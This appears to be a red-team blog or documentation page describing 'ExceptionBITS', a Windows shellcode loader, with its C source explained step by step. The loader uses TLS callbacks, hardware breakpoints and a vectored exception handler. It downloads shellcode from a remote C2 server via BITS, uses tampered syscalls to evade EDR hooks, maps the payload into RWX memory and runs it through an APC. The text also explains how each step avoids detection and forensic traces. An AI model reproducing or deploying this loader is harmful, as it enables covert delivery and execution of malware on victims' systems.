# ExceptionBITS

[ExeptionBits ](https://github.com/Swayampadhy/ExceptionBITS)is a hardware-breakpoints based loader that sets up hardware breakpoints and the Vectored Exception Handler(VEH) even execution of the main thread using TLS callbacks. The idea is to put the checkpoints on obscure memory locations or external functions in a benign loking application. These so called breakpoint "checkpoints", when hit, can lead the program to enter a "EXCEPTION\_SINGLE\_STEP" mode where the magic happens.

In this mode, the VEH controls the execution flow of the program. The main VEH then downloads the shellcode from a C2/remote server using Windows Background Intelligent Transfer Service (BITS), stores the payload in mapped memory and finally executes in a Asynchronous Process Call (APC).

In order to circumvent user-mode hooks, ExceptionBITS uses something similar to [syscalls tampering](https://github.com/rad9800/TamperingSyscalls) by **rad9800** and [Tampered Syscalls Via Hardware BreakPoints](https://maldevacademy.com/) by **Maldev-Academy**. How syscalls tampering is implemented in this is as follows -

* First the VEH calculates the SSN for the required Zw\* "malicious" functions from ntdll.dll's export table and uses the sorted index as the SSN.
* The VEH then calls a benign NTAPI such as NtQuerySecurityObject with some function arguments.
* It then hooks onto that benign NTAPI by placing a hardware breakpoint at the start of the syscall stub.
* The CRITICAL\_SECTIONS are then synchronized to prevent race conditions.
* In the nested VEH for the "malicious" functions, the SSN of the benign finction is replaced in the RAX register.
* Finally the desired number of parameters are replaced and the function is executed.
* This is repeated for all the "malicious" functions.

***

## Overall Program Flowchart

<figure><img src="https://2429440930-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fvmiq90eCUf7ZZMUGm7Qu%2Fuploads%2FVZf9pseeQc94TdYnDE25%2Foffence_flowchart.png?alt=media&#x26;token=e558dfcd-b803-4493-aaa9-173576444eb6" alt=""><figcaption></figcaption></figure>

***

## Detailed Working Of ExceptionBITS

ExceptionBITS operates through four distinct stages:&#x20;

**TLS initialization → Main execution → Payload delivery → Syscall tampering.**

We will go through all the stages one by one in the expandables below.

<details>

<summary>TLS Initialization</summary>

#### 1.1 TLS Callback registration

{% code overflow="wrap" %}

```c
#pragma comment (linker, "/INCLUDE:_tls_used")
#ifdef _WIN64
#pragma comment (linker, "/INCLUDE:HWBPTlsCallback")
#else
#pragma comment (linker, "/INCLUDE:_HWBPTlsCallback")
#endif

#pragma const_seg(".CRT$XLB")
EXTERN_C CONST PIMAGE_TLS_CALLBACK HWBPTlsCallback = (PIMAGE_TLS_CALLBACK)HWBPTlsCallbackFunction;
#pragma const_seg()
```

{% endcode %}

* `#pragma comment (linker, "/INCLUDE:_tls_used")` forces the linker to include the `_tls_used` symbol, which tells Windows that this executable contains TLS data and callbacks.
* The `#ifdef _WIN64` block handles platform-specific symbol naming. On x86, symbols are prefixed with an underscore, so `_HWBPTlsCallback` is used instead of `HWBPTlsCallback`.
* `#pragma const_seg(".CRT$XLB")` places the next variable into a special PE section called `.CRT$XLB`. The `.CRT$` sections (ranging from `.CRT$XLA` to `.CRT$XLZ`) are reserved for C Runtime initialization.
* The callback pointer `HWBPTlsCallback` is assigned to point to `HWBPTlsCallbackFunction`, which will be called automatically by the Windows loader

The `.CRT$XLB` section is important because Windows loader automatically processes sections named `.CRT$XL*` during process initialization before the `main()` entry point executes. The sections are processed alphabetically (XLA, XLB, XLC...), so placing the callback in XLB ensures it runs early but after  essential system-critical initialization in XLA. This gives ExeceptionBITS a pre-execution window where security monitoring tools may not yet be fully active, as most EDR hooks are established during or after DLL loading which happens after TLS callbacks.

#### **1.2 TLS Callback Function Implementation**

{% code overflow="wrap" %}

```c
VOID NTAPI HWBPTlsCallbackFunction(PVOID hModule, DWORD dwReason, PVOID pContext) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        printf("[TLS][*] TLS Callback executed - Process attach\n");
        
        // Store the current thread ID
        tls_thread_id = GetCurrentThreadId();
        
        // Register primary Vectored Exception Handler
        veh_handle = AddVectoredExceptionHandler(1, VectoredHandler);
        if (!veh_handle) {
            printf("[TLS][!] Failed to add vectored exception handler\n");
            return;
        }
        
        // Set up hardware breakpoint context
        CONTEXT ctx = { 0 };
        ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
        HANDLE thread = GetCurrentThread();
        
        if (GetThreadContext(thread, &ctx)) {
            // Set Dr0 to point to DummyFunction
            #if defined(_WIN64)
            ctx.Dr0 = (DWORD64)&DummyFunction;
            #else
            ctx.Dr0 = (DWORD)&DummyFunction;
            #endif
            
            ctx.Dr7 = 0x00000001;  // Enable L0 bit for Dr0
            ctx.Dr6 = 0;           // Clear debug status register
            
            if (SetThreadContext(thread, &ctx)) {
                // Save context for later restoration
                saved_context = ctx;
                context_saved = TRUE;
            }
        }
    }
}
```

{% endcode %}

* `dwReason == DLL_PROCESS_ATTACH` checks if this callback is being invoked during process initialization. TLS callbacks receive the same reason codes as `DllMain` (DLL\_PROCESS\_ATTACH, DLL\_THREAD\_ATTACH, DLL\_THREAD\_DETACH, DLL\_PROCESS\_DETACH).
* `tls_thread_id = GetCurrentThreadId()` stores the main thread's ID, which will be used later to verify context restoration is happening on the same thread.
* `AddVectoredExceptionHandler(1, VectoredHandler)` registers a Vectored Exception Handler (VEH) with priority 1. VEHs are called before structured exception handlers (SEH) when exceptions occur. The priority determines the order.
* `CONTEXT ctx = { 0 }` initializes a CONTEXT structure, which represents the CPU's register state for a thread.
* `ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS` specifies that we want to manipulate the debug registers (Dr0-Dr7).
* `GetThreadContext(thread, &ctx)` retrieves the current register state of the thread.
* `ctx.Dr0 = (DWORD64)&DummyFunction` sets the Dr0 debug register to the memory address of `DummyFunction`. Dr0-Dr3 are address registers that can hold breakpoint addresses.
* `ctx.Dr7 = 0x00000001` configures the Dr7 control register. The value `0x00000001` sets bit 0 (L0), which enables the breakpoint stored in Dr0 as a local (thread-specific) breakpoint.
* `ctx.Dr6 = 0` clears the Dr6 status register, which tracks which breakpoints have fired.
* `SetThreadContext(thread, &ctx)` applies the modified register state back to the thread, activating the hardware breakpoint.
* `saved_context = ctx` stores the entire context (including the breakpoint configuration) in a global variable for later restoration.

By setting only bit 0 (`0x00000001`), the loader creates an execution breakpoint on Dr0. When the CPU's instruction pointer reaches the address stored in Dr0, it generates a `SINGLE_STEP` exception instead of executing the instruction. This is harder for security tools to trace than traditional function calls.&#x20;

The context is saved because Windows may clear debug registers when transitioning between kernel and user mode or during context switches. By saving it, the loader can restore the breakpoint if Windows clears it before `main()` executes.

#### Demo Target Function Call

```c
__declspec(noinline) void DummyFunction() {
    // Empty function that will trigger hardware breakpoint
}

typedef void (*pfunc_t)();
static pfunc_t volatile pDummy = DummyFunction;
```

* `__declspec(noinline)` is a compiler directive that prevents the optimizer from inlining this function. Inlining would eliminate the function's distinct address, which would break the hardware breakpoint targeting.
* The function body is intentionally empty because it will never actually execute. This is for demo purposes but this function can be changed to any other external function or an obscure memory region.
* `typedef void (*pfunc_t)()` defines a function pointer type that points to functions taking no arguments and returning void.
* `static pfunc_t volatile pDummy = DummyFunction` creates a static, volatile function pointer. The `volatile` keyword prevents the compiler from optimizing away the indirection, ensuring the call goes through the pointer.

Using a function pointer instead of calling `DummyFunction()` can confuse static analysis tools. The `volatile` qualifier forces the compiler to generate actual memory access for the function pointer, preventing optimization that might make the call pattern obvious to signature-based detection.

</details>

<details>

<summary>Main Execution</summary>

#### **2.1 Context Restoration**

{% code overflow="wrap" %}

```css
BOOL RestoreSavedContext() {
    if (!context_saved) {
        printf("[!] No saved context available\n");
        return FALSE;
    }
    
    printf("[*] Restoring saved thread context from TLS callback\n");
    printf("[*] Current thread ID: %lu, TLS thread ID: %lu\n", 
           GetCurrentThreadId(), tls_thread_id);
    printf("[*] Restoring Dr0: 0x%p, Dr7: 0x%lx\n", 
           (void*)saved_context.Dr0, (unsigned long)saved_context.Dr7);
    
    HANDLE thread = GetCurrentThread();
    if (SetThreadContext(thread, &saved_context)) {
        printf("[*] Successfully restored thread context from TLS callback\n");
        return TRUE;
    }
    else {
        printf("[!] Failed to restore thread context, error: %lu\n", GetLastError());
        return FALSE;
    }
}
```

{% endcode %}

* `if (!context_saved)` checks if the TLS callback successfully saved a context. If not, there's nothing to restore.
* The function logs the current thread ID and the TLS thread ID to verify they match, ensuring we're restoring the context on the correct thread.
* `GetCurrentThread()` returns a pseudo-handle to the current thread. This is always `-2` and represents "the calling thread".
* `SetThreadContext(thread, &saved_context)` reapplies the entire saved context, including the Dr0, Dr6, and Dr7 registers, effectively reactivating the hardware breakpoint on `DummyFunction`

This restoration step is necessary because Windows may clear debug registers during thread context switches or when returning from kernel mode to user mode as a security measure. By restoring the context at the beginning of `main(),`   ExceptionBITS ensures that the hardware breakpoint is active when `pDummy()` is called.

#### 2.2 Main Function Flow

```c
int main() {
    printf("[*] Main function started\n");
    printf("[*] Current thread ID: %lu\n", GetCurrentThreadId());
    
    // Verify VEH was set in TLS callback
    if (!veh_handle) {
        printf("[!] VEH was not set up in TLS callback!\n");
        return -1;
    }
    
    printf("[*] VEH handle from TLS: 0x%p\n", veh_handle);
    
    // Restore saved TLS thread context
    RestoreSavedContext();
    
    // Call the dummy function to trigger the breakpoint
    printf("[*] Calling DummyFunction to trigger hardware breakpoint\n");
    pDummy();
    
    printf("[*] Now executing the payload\n");
    
    // Enter alertable wait for APC execution with timeout
    DWORD start_time = GetTickCount();
    BOOL apc_executed = FALSE;
    
    // Wait in alertable state for APC to execute or timeout
    while (GetTickCount() - start_time < APC_TIMEOUT) {
        DWORD result = SleepEx(1000, TRUE);
        if (result == WAIT_IO_COMPLETION) {
            printf("[*] APC executed successfully\n");
            apc_executed = TRUE;
            break;
        }
    }
      
    // Cleanup
    if (veh_handle) {
        RemoveVectoredExceptionHandler(veh_handle);
        printf("[*] Vectored exception handler removed\n");
        veh_handle = NULL;
    }
    
    HaltHardwareBreakpointHooking();
    printf("[*] Program exiting cleanly\n");
    return 0;
}
```

* The function begins with verification that `veh_handle` is valid, confirming the TLS callback executed successfully.
* `RestoreSavedContext()` reactivates the hardware breakpoint that may have been cleared by Windows.
* `pDummy()` calls the function pointer pointing to `DummyFunction`. This is where execution hits the hardware breakpoint.
* When the breakpoint triggers, the CPU immediately generates a `SINGLE_STEP` exception, and control transfers to `VectoredHandler` without executing any code in `DummyFunction`.
* After `VectoredHandler` completes and returns `EXCEPTION_CONTINUE_EXECUTION`, execution resumes here at the instruction after `pDummy()`.
* `GetTickCount()` returns the number of milliseconds since system boot. This is used to implement a timeout mechanism.
* `SleepEx(1000, TRUE)` puts the thread to sleep for 1000ms (1 second), but with the second parameter `TRUE`, it enters an **alertable wait state**.
* In an alertable wait, the kernel can interrupt the sleep to deliver Asynchronous Procedure Calls (APCs) queued to this thread.
* `result == WAIT_IO_COMPLETION` indicates the sleep was interrupted by an APC. `WAIT_IO_COMPLETION` (value 0xC0) means an APC was delivered and executed.
* The loop continues until either an APC executes or 10 seconds (APC\_TIMEOUT) elapse, providing a timeout mechanism.
* `RemoveVectoredExceptionHandler(veh_handle)` unregisters the main VEH to clean up.
* `HaltHardwareBreakpointHooking()` removes the syscall tampering VEH and cleans up the critical section.

The `pDummy()` call triggers the entire payload delivery chain. The use of `SleepEx` with alertable wait is the correct way to allow APC execution in user mode. Regular `Sleep()` would not allow APCs to run. APCs are a kernel-level mechanism that allows one thread to queue a function to be executed by another thread, but they only execute when the target thread is in an alertable wait state (via functions like `SleepEx`, `WaitForSingleObjectEx`, etc.). The timeout mechanism prevents the program from hanging indefinitely if something goes wrong with the payload delivery.

</details>

<details>

<summary>Payload Delivery</summary>

#### **3.1 Exception Filtering and Breakpoint Clearing**

{% code overflow="wrap" %}

```c
LONG WINAPI VectoredHandler(EXCEPTION_POINTERS* ExceptionInfo) {
    static BOOL main_processing = FALSE;
    printf("[*] VectoredHandler called - Exception Code: 0x%08lX\n", 
           ExceptionInfo->ExceptionRecord->ExceptionCode);
    
    // Check if this is a single-step exception (hardware breakpoint)
    if (ExceptionInfo->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP) 
    {
        return EXCEPTION_CONTINUE_SEARCH;
    }
    
    if (shellcode_executed) {
        return EXCEPTION_CONTINUE_SEARCH;
    }
    
    if (main_processing) {
        return EXCEPTION_CONTINUE_SEARCH;
    }
    
    // This is the initial breakpoint on DummyFunction
    printf("[*] Single step exception caught - Address: 0x%p\n", 
           ExceptionInfo->ExceptionRecord->ExceptionAddress);
    printf("[*] Expected breakpoint address: 0x%p\n", (PVOID)DummyFunction);
    
    main_processing = TRUE;
    
    // Save thread context for restoration in main thread
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
    HANDLE thread = GetCurrentThread();
    
    // Clear the hardware breakpoint on DummyFunction
    if (GetThreadContext(thread, &ctx)) {
        printf("[*] Clearing hardware breakpoint on DummyFunction\n");
        ctx.Dr0 = 0;
        ctx.Dr6 = 0;
        ctx.Dr7 = 0;
        SetThreadContext(thread, &ctx);
    }
```

{% endcode %}

* `EXCEPTION_POINTERS* ExceptionInfo` is a structure containing two nested structures: `ExceptionRecord` (details about the exception) and `ContextRecord` (CPU register state when the exception occurred).
* `static BOOL main_processing = FALSE` is a static variable (persistent across function calls) used as a reentry guard. Once set to TRUE, subsequent calls to this handler during the same execution will immediately return.
* `ExceptionInfo->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP` checks if the exception is the expected type. `EXCEPTION_SINGLE_STEP` (0x80000004) is generated by hardware breakpoints and the trap flag. If it's a different exception type, this handler isn't interested, so it returns `EXCEPTION_CONTINUE_SEARCH` to let other handlers process it.
* `if (shellcode_executed)` and `if (main_processing)` are checks to prevent reentry. Once the main work is done (`main_processing = TRUE`) or shellcode is running (`shellcode_executed = TRUE`), this handler steps aside and lets the syscall tampering handler deal with any further exceptions.
* `ExceptionInfo->ExceptionRecord->ExceptionAddress` contains the instruction pointer (RIP/EIP) where the exception occurred. Logging this confirms it matches `DummyFunction`'s address.
* `ctx.Dr0 = 0; ctx.Dr6 = 0; ctx.Dr7 = 0` clears all debug registers, disabling the hardware breakpoint on `DummyFunction`. This is critical because otherwise, returning `EXCEPTION_CONTINUE_EXECUTION` would cause the breakpoint to trigger again immediately, creating an infinite loop.

The reentry guards (`main_processing` and `shellcode_executed`) are essential because this is a global exception handler that will be called for EVERY `SINGLE_STEP` exception in the process. Once the main payload delivery logic runs, we don't want it to run again. The syscall tampering mechanism will generate many `SINGLE_STEP` exceptions (one for each tampered syscall), and those need to be handled by the dedicated syscall tampering VEH (registered with priority 0, so it runs first), not this handler. By returning `EXCEPTION_CONTINUE_SEARCH` when appropriate, this handler cooperates with the other VEH in a multi-handler architecture.

#### **3.2 Hash Calculation and Syscall Infrastructure**

```c
    // Calculate syscall hashes
    g_ZwCreateSection_Hash = CALC_HASH("ZwCreateSection");
    g_ZwMapViewOfSection_Hash = CALC_HASH("ZwMapViewOfSection");
    g_ZwQueueApcThread_Hash = CALC_HASH("ZwQueueApcThread");
    
    printf("[*] Calculated hashes:\n");
    printf("    ZwCreateSection: 0x%0.8X\n", g_ZwCreateSection_Hash);
    printf("    ZwMapViewOfSection: 0x%0.8X\n", g_ZwMapViewOfSection_Hash);
    printf("    ZwQueueApcThread: 0x%0.8X\n", g_ZwQueueApcThread_Hash);
    fflush(stdout);
    
    // Initialize tampered syscall hooking
    printf("[*] Initializing tampered syscall hooking\n");
    if (!InitHardwareBreakpointHooking()) {
        printf("[!] Failed to initialize tampered syscall hooking\n");
        main_processing = FALSE;
        shellcode_executed = FALSE;
        return EXCEPTION_CONTINUE_EXECUTION;
    }
```

* `CALC_HASH("ZwCreateSection")` is a macro that expands to `CRC32BA("ZwCreateSection")`, which computes a 32-bit CRC32 hash of the function name string.
* The three hash calculations produce unique identifiers for the NT functions needed: `ZwCreateSection` (creates a memory section object), `ZwMapViewOfSection` (maps the section into the process's address space), and `ZwQueueApcThread` (queues an APC for execution).
* Global variables `g_ZwCreateSection_Hash`, `g_ZwMapViewOfSection_Hash`, and `g_ZwQueueApcThread_Hash` store these hashes for later use by the `TAMPER_SYSCALL` macro.
* `InitHardwareBreakpointHooking()` is a function that registers a second VEH specifically for intercepting the tampered syscalls. This VEH has priority 0, meaning it will be called before the main VEH (priority 1).
* If initialization fails, the function resets the flags and returns `EXCEPTION_CONTINUE_EXECUTION` to allow the program to continue (though it won't function correctly).

#### **3.3 BITS-Based Shellcode Download**

{% code overflow="wrap" %}

```c
DWORD DownloadShellcode(const char* url, char* buffer, DWORD maxSize) {
    HRESULT hr;
    IBackgroundCopyManager* pManager = NULL;
    IBackgroundCopyJob* pJob = NULL;
    GUID jobId;
    BG_JOB_STATE state;
    WCHAR* wUrl = NULL;
    WCHAR* wTempPath = NULL;
    char tempPath[MAX_PATH] = { 0 };
    DWORD bytesRead = 0;
    HANDLE hFile = INVALID_HANDLE_VALUE;
    
    printf("[*] Starting BITS download from %s\n", url);
    
    // Initialize COM
    hr = CoInitializeEx(NULL, COINIT_MULTITHREADED);
    if (FAILED(hr)) {
        printf("[!] CoInitializeEx failed, HRESULT=0x%08lx\n", (unsigned long)hr);
        return 0;
    }
    
    // Create temporary file path
    GetTempPathA(MAX_PATH, tempPath);
    strcat_s(tempPath, MAX_PATH, "shellcode.tmp");
    
    // Create BITS manager
    hr = CoCreateInstance(&CLSID_BackgroundCopyManager, NULL, CLSCTX_ALL, 
                          &IID_IBackgroundCopyManager, (void**)&pManager);
    if (FAILED(hr)) {
        printf("[!] CoCreateInstance failed, HRESULT=0x%08lx\n", (unsigned long)hr);
        goto cleanup;
    }
    
    // Create BITS job
    hr = pManager->lpVtbl->CreateJob(pManager, L"HWBP_Download", BG_JOB_TYPE_DOWNLOAD, &jobId, &pJob);
    if (FAILED(hr)) {
        printf("[!] CreateJob failed, HRESULT=0x%08lx\n", (unsigned long)hr);
        goto cleanup;
    }
```

{% endcode %}

* `IBackgroundCopyManager* pManager = NULL` declares a pointer to the BITS manager interface. BITS (Background Intelligent Transfer Service) is a Windows component designed for reliable background file transfers.
* `HRESULT hr` stores return values from COM methods. COM uses `HRESULT` values where negative numbers (< 0) indicate failure, and non-negative numbers indicate success.
* `CoInitializeEx(NULL, COINIT_MULTITHREADED)` initializes the COM library for multi-threaded apartment model. This is required before using any COM interfaces.
* `FAILED(hr)` is a macro that checks if `hr < 0`, indicating a COM error.
* `GetTempPathA(MAX_PATH, tempPath)` retrieves the path to the system's temporary directory (typically `C:\Users\<username>\AppData\Local\Temp`).
* `strcat_s(tempPath, MAX_PATH, "shellcode.tmp")` appends "shellcode.tmp" to the temp path, creating a full file path for the download destination.
* `CoCreateInstance(&CLSID_BackgroundCopyManager, ...)` creates an instance of the BITS Background Copy Manager COM object. The `CLSID_BackgroundCopyManager` is the unique identifier `{4991d34b-80a1-4291-83b6-3328366b9097}`.
* `pManager->lpVtbl->CreateJob(...)` creates a new BITS job named "HWBP\_Download" of type `BG_JOB_TYPE_DOWNLOAD` (value 0). BITS jobs can be downloads, uploads, or upload-replies.

{% code overflow="wrap" %}

```c
    // Convert URL and temp path to wide strings
    int urlLen = MultiByteToWideChar(CP_UTF8, 0, url, -1, NULL, 0);
    wUrl = (WCHAR*)malloc(urlLen * sizeof(WCHAR));
    if (!wUrl) goto cleanup;
    MultiByteToWideChar(CP_UTF8, 0, url, -1, wUrl, urlLen);
    
    int tempLen = MultiByteToWideChar(CP_UTF8, 0, tempPath, -1, NULL, 0);
    wTempPath = (WCHAR*)malloc(tempLen * sizeof(WCHAR));
    if (!wTempPath) goto cleanup;
    MultiByteToWideChar(CP_UTF8, 0, tempPath, -1, wTempPath, tempLen);
    
    // Add file to job
    hr = pJob->lpVtbl->AddFile(pJob, wUrl, wTempPath);
    if (FAILED(hr)) {
        printf("[!] AddFile failed, HRESULT=0x%08lx\n", (unsigned long)hr);
        goto cleanup;
    }
    
    // Resume job
    hr = pJob->lpVtbl->Resume(pJob);
    if (FAILED(hr)) {
        printf("[!] Resume failed, HRESULT=0x%08lx\n", (unsigned long)hr);
        goto cleanup;
    }
    
    // Poll job state until completion or error
    do {
        Sleep(300);
        hr = pJob->lpVtbl->GetState(pJob, &state);
        if (FAILED(hr)) goto cleanup;
    } while (state != BG_JOB_STATE_ERROR && state != BG_JOB_STATE_TRANSFERRED);
    
    if (state == BG_JOB_STATE_ERROR) {
        printf("[!] BITS job failed\n");
        goto cleanup;
    }
    
    // Complete the job
    hr = pJob->lpVtbl->Complete(pJob);
    if (FAILED(hr)) goto cleanup;
    
    // Read downloaded file
    hFile = CreateFileA(tempPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) goto cleanup;
    
    DWORD fileSize = GetFileSize(hFile, NULL);
    if (fileSize == INVALID_FILE_SIZE || fileSize > maxSize) goto cleanup;
    
    if (!ReadFile(hFile, buffer, fileSize, &bytesRead, NULL)) {
        bytesRead = 0;
    }
    
cleanup:
    if (hFile != INVALID_HANDLE_VALUE) {
        CloseHandle(hFile);
        DeleteFileA(tempPath);
    }
    if (wUrl) free(wUrl);
    if (wTempPath) free(wTempPath);
    if (pJob) pJob->lpVtbl->Release(pJob);
    if (pManager) pManager->lpVtbl->Release(pManager);
    CoUninitialize();
    
    return bytesRead;
}
```

{% endcode %}

* `MultiByteToWideChar(CP_UTF8, 0, url, -1, NULL, 0)` calculates the number of wide characters needed to represent the UTF-8 URL string. Calling it with `NULL` and `0` for the output parameters makes it return the required buffer size.
* `malloc(urlLen * sizeof(WCHAR))` allocates memory for the wide character string. `WCHAR` is typically 2 bytes.
* The second `MultiByteToWideChar` call actually performs the conversion from multi-byte (UTF-8) to wide character (UTF-16), which BITS requires.
* `pJob->lpVtbl->AddFile(pJob, wUrl, wTempPath)` adds a file transfer to the job, specifying the remote URL and local destination path.
* `pJob->lpVtbl->Resume(pJob)` starts the download. BITS jobs are created in a suspended state and must be explicitly resumed.
* The `do-while` loop polls the job state every 300ms. `GetState` returns values like `BG_JOB_STATE_QUEUED` (0), `BG_JOB_STATE_CONNECTING` (1), `BG_JOB_STATE_TRANSFERRING` (2), `BG_JOB_STATE_TRANSFERRED` (4), or `BG_JOB_STATE_ERROR` (8).
* `pJob->lpVtbl->Complete(pJob)` finalizes the job, moving the temporary file to its final destination. BITS downloads to a temporary location first.
* `CreateFileA` opens the downloaded file with `GENERIC_READ` access.
* `GetFileSize` retrieves the file size. The validation `fileSize > maxSize` prevents buffer overflows.
* `ReadFile` reads the entire file content into the provided buffer.
* The `cleanup` section uses `goto` for error handling, ensuring COM objects are released, memory is freed, and the temporary file is deleted regardless of how the function exits

BITS is a legitimate Windows service used by Windows Update, Microsoft Store, and many enterprise applications, so BITS traffic is common and expected. Network monitoring won't flag it as suspicious. Second, BITS handles network interruptions gracefully; if the connection drops, BITS automatically resumes when connectivity returns, making the download highly reliable. Third, BITS respects network throttling policies and uses idle bandwidth, making it less likely to trigger network anomaly detection based on bandwidth usage patterns. Fourth, BITS jobs persist across reboots i.e if the system restarts during download, BITS resumes automatically. However, this also means forensic investigators could find evidence of the BITS job in Windows event logs and BITS database files, which is why the cleanup is thorough. The conversion to wide character strings is necessary because BITS's COM interface expects UTF-16 strings (Windows's internal Unicode format). The polling loop could be replaced with BITS's callback mechanism for efficiency, but polling is simpler and avoids registering additional COM callbacks that might leave forensic artifacts. The immediate deletion of the temporary file after reading it into memory minimizes the window during which the shellcode exists on disk. In a more sophisticated version, the downloaded file could be encrypted and decrypted in memory only, never touching disk in decrypted form.

#### **3.4 Memory Allocation via Tampered Syscalls**

{% code overflow="wrap" %}

```c
BOOL FileMapInjectTampered(PBYTE pPayload, SIZE_T sPayloadSize, PVOID* ppAddress) {
    printf("[*] Using TAMPERED syscalls for file mapping injection\n");
    
    HANDLE hSection = NULL;
    PVOID pAddress = NULL;
    SIZE_T sViewSize = sPayloadSize;
    LARGE_INTEGER MaximumSize = { 0 };
    MaximumSize.QuadPart = (LONGLONG)sPayloadSize;
    
    // Create section using tampered syscall - ZwCreateSection
    printf("[*] Creating section with TAMPERED ZwCreateSection (Hash: 0x%0.8X)...\n", 
           g_ZwCreateSection_Hash);
    TAMPER_SYSCALL(g_ZwCreateSection_Hash, &hSection, SECTION_ALL_ACCESS, NULL, &MaximumSize, 
                   PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL, NULL, NULL, NULL, NULL);
    
    if (!hSection) {
        printf("[!] Failed to create section\n");
        return FALSE;
    }
    
    printf("[*] Section created successfully: 0x%p\n", hSection);
    
    // Map view using tampered syscall - ZwMapViewOfSection
    printf("[*] Mapping view with TAMPERED ZwMapViewOfSection (Hash: 0x%0.8X)...\n", 
           g_ZwMapViewOfSection_Hash);
    TAMPER_SYSCALL(g_ZwMapViewOfSection_Hash, hSection, (HANDLE)-1, &pAddress, NULL, NULL, NULL, 
                   &sViewSize, ViewUnmap, NULL, PAGE_EXECUTE_READWRITE, NULL);
    
    if (!pAddress) {
        printf("[!] Failed to map view of section\n");
        CloseHandle(hSection);
        return FALSE;
    }
    
    printf("[*] Allocated Address At: 0x%p Of Size: %lu\n", pAddress, (unsigned long)sViewSize);
    
    // Write payload
    memcpy(pAddress, pPayload, sPayloadSize);
    printf("[*] Payload copied from 0x%p to 0x%p\n", pPayload, pAddress);
    
    hFileMapping = hSection;
    *ppAddress = pAddress;
    
    printf("[*] Shellcode successfully mapped using TAMPERED syscalls\n");
    return TRUE;
}
```

{% endcode %}

* `PBYTE pPayload` is a pointer to the downloaded shellcode buffer, `SIZE_T sPayloadSize` is its size in bytes, and `PVOID* ppAddress` is an output parameter that will receive the address of the allocated memory.
* `LARGE_INTEGER MaximumSize` is a 64-bit integer structure used to specify sizes larger than 32 bits. `QuadPart` accesses it as a single 64-bit value.
* The `TAMPER_SYSCALL` macro invokes the syscall tampering mechanism. The first parameter is the hash of the target function (`ZwCreateSection`), followed by that function's parameters.
* For `ZwCreateSection`: `&hSection` (output handle), `SECTION_ALL_ACCESS` (0x1F, all access rights), `NULL` (no object attributes), `&MaximumSize` (section size), `PAGE_EXECUTE_READWRITE` (0x40, RWX memory protection), `SEC_COMMIT` (0x8000000, commit physical storage), then NULL padding for additional parameters.
* `(HANDLE)-1` is a pseudo-handle meaning "current process". It's the equivalent of `GetCurrentProcess()` but as a constant.
* For `ZwMapViewOfSection`: `hSection` (section handle), `(HANDLE)-1` (target process), `&pAddress` (output base address), `NULL` (zero bits—no specific address requirements), `NULL` (commit size), `NULL` (section offset), `&sViewSize` (view size), `ViewUnmap` (2, inheritance disposition), `NULL` (allocation type), `PAGE_EXECUTE_READWRITE` (protection), then NULL padding.
* `memcpy(pAddress, pPayload, sPayloadSize)` copies the shellcode bytes from the temporary buffer to the newly allocated executable memory.
* `hFileMapping = hSection` stores the section handle globally for later cleanup.
* `*ppAddress = pAddress` writes the allocated address to the output parameter, so the caller knows where the shellcode is.

Section objects are kernel objects that represent shared memory regions. Unlike `VirtualAlloc` which directly allocates memory in a process, section objects are created in kernel space then mapped into user space. This is more flexible but also less commonly monitored by EDR. Many security products focus on `VirtualAllocEx` or `NtAllocateVirtualMemory` for detecting malicious memory allocation, but `ZwCreateSection`/`ZwMapViewOfSection` is an alternative path that's often under-monitored. Allocating with `PAGE_EXECUTE_READWRITE` immediately is a red flag in modern security analysis; most legitimate code allocates memory with `PAGE_READWRITE`, writes code to it, then changes protection to `PAGE_EXECUTE_READ`. However, since this loader is using syscall tampering, the actual Win32 API being monitored (`VirtualAllocEx`) is never called, so permission-based heuristics that watch API parameters are bypassed. The section object persists even if the handle is closed, as long as there's a mapped view, which is why `CloseHandle` can safely be called on error paths. The `ViewUnmap` parameter (value 2) specifies that child processes won't inherit this mapping, which is appropriate for shellcode injection.

#### **3.5 APC Queueing**

{% code overflow="wrap" %}

```c
// Download shellcode via BITS
static char tempBuffer[MAX_SHELLCODE_SIZE] = { 0 };
shellcode_size = DownloadShellcode(SHELLCODE_URL, tempBuffer, MAX_SHELLCODE_SIZE);
printf("[*] Downloaded shellcode size: %lu bytes\n", shellcode_size);

if (shellcode_size == 0) {
    printf("[!] DownloadShellcode returned zero\n");
    main_processing = FALSE;
    shellcode_executed = FALSE;
    return EXCEPTION_CONTINUE_EXECUTION;
}

// Use TAMPERED syscalls for file mapping
if (!FileMapInjectTampered((PBYTE)tempBuffer, shellcode_size, (PVOID*)&shellcode_buffer)) {
    printf("[!] FileMapInjectTampered failed\n");
    main_processing = FALSE;
    shellcode_executed = FALSE;
    return EXCEPTION_CONTINUE_EXECUTION;
}

// Queue APC using TAMPERED syscall - ZwQueueApcThread
printf("[*] Queuing APC using TAMPERED ZwQueueApcThread (Hash: 0x%0.8X)...\n", 
       g_ZwQueueApcThread_Hash);
TAMPER_SYSCALL(g_ZwQueueApcThread_Hash, GetCurrentThread(), (PVOID)shellcode_buffer, 
               NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL);

printf("[*] APC queued successfully\n");

// Mark as completed
shellcode_executed = TRUE;
main_processing = FALSE;

printf("[*] Returning to alertable wait in main()\n");
return EXCEPTION_CONTINUE_EXECUTION;
}
```

{% endcode %}

* `static char tempBuffer[MAX_SHELLCODE_SIZE]` declares a 4096-byte buffer on the stack (actually in the DATA section due to `static`). Static local variables persist across function calls and are zero-initialized.
* `DownloadShellcode` is called with the URL, buffer, and maximum size. It returns the number of bytes actually read.
* If download fails (`shellcode_size == 0`), the function resets flags and returns `EXCEPTION_CONTINUE_EXECUTION`, which resumes execution after the `pDummy()` call in `main()`.
* `FileMapInjectTampered` allocates executable memory and copies the shellcode. On failure, same error handling applies.
* For `ZwQueueApcThread`: `GetCurrentThread()` (target thread handle), `(PVOID)shellcode_buffer` (APC routine address—this is the shellcode entry point), then 10 NULL parameters (for APC arguments and system-specific use).
